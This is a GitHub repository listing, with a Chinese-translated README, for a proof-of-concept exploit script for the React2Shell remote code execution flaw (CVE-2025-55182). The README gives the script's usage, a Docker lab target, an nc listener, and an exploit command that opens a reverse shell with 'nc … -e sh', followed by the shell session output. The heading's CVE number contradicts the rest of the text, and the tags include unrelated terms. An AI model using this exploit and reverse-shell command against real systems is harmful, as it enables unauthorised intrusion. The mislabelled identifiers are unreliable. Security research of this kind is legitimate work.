masterwok/CVE-2025-55182-React2Shell-PoC

GitHub: masterwok/CVE-2025-55182-React2Shell-PoC

针对 CVE-2025-55182 (React2Shell) 漏洞的概念验证利用脚本,能够通过发送特制请求实现远程代码执行。

Stars: 0 | Forks: 0

# PoC: CVE-2026-33017 [https://nvd.nist.gov/vuln/detail/CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182) ## 使用说明 ``` usage: CVE-2025-55182.py [-h] --command COMMAND target PoC exploit: CVE-2025-55182 positional arguments: target Target hostname options: -h, --help show this help message and exit --command COMMAND Command to run on target ``` ## 示例 ``` # 创建 docker 实例 docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182 # 启动 listener nc -lnvp 4444 # 运行 exploit python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211 4444 -e sh" # 应在 listener 中接收到 reverse shell Listening on 0.0.0.0 4444 Connection received on 172.17.0.2 43911 uname -a Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux ``` 本项目仅用于教育和研究目的。 作者不对因误用或由本代码造成的损害负责。
标签:CISA项目, CVE-2025-55182, CVE-2026-33017, Docker, Exploit, PoC, Python, RCE, React, React2Shell, Reverse Shell, Syscalls, 反向外壳, 安全防御评估, 无后门, 暴力破解, 概念验证, 漏洞复现, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向工具, 隐私保护